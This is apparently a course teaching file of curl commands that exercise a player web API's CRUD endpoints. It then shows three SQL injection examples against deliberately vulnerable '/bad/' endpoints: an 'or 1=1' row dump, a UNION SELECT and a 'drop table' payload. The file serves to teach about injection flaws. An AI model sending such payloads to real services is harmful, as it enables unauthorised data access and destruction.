-- Simple curl tests of the player API endpoints.

export SERVICE_URL=https://cs262-webservice-abebhtekgegdb2as.canadacentral-01.azurewebsites.net

curl --request GET \
        ${SERVICE_URL}/players

curl --request POST \
        --header "Content-Type: application/json" \
        --data '{"name":"test name...", "email":"test email..."}' \
        ${SERVICE_URL}/players

curl --request PUT \
        --header "Content-Type: application/json" \
        --data '{"name":"new test name...", "email":"new test email..."}' \
        ${SERVICE_URL}/players/4

curl --request DELETE \
        ${SERVICE_URL}/players/4


-- SQL injection examples (only work when /bad/* endpoints are enabled)

# URL: https://cs262-webservice-abebhtekgegdb2as.canadacentral-01.azurewebsites.net/bad/players/1 or 1=1
curl --request GET \
        ${SERVICE_URL}/bad/players/1%20or%201=1

# URL: https://cs262-webservice-abebhtekgegdb2as.canadacentral-01.azurewebsites.net/bad/players/1 union select * from player
curl --request GET \
        ${SERVICE_URL}/bad/players/1%20union%20select%20*%20from%20player

# URL: https://cs262-webservice-abebhtekgegdb2as.canadacentral-01.azurewebsites.net/bad/players/1; drop table playergame
curl --request GET \
        ${SERVICE_URL}/bad/players/1%3B%20drop%20table%20playergame
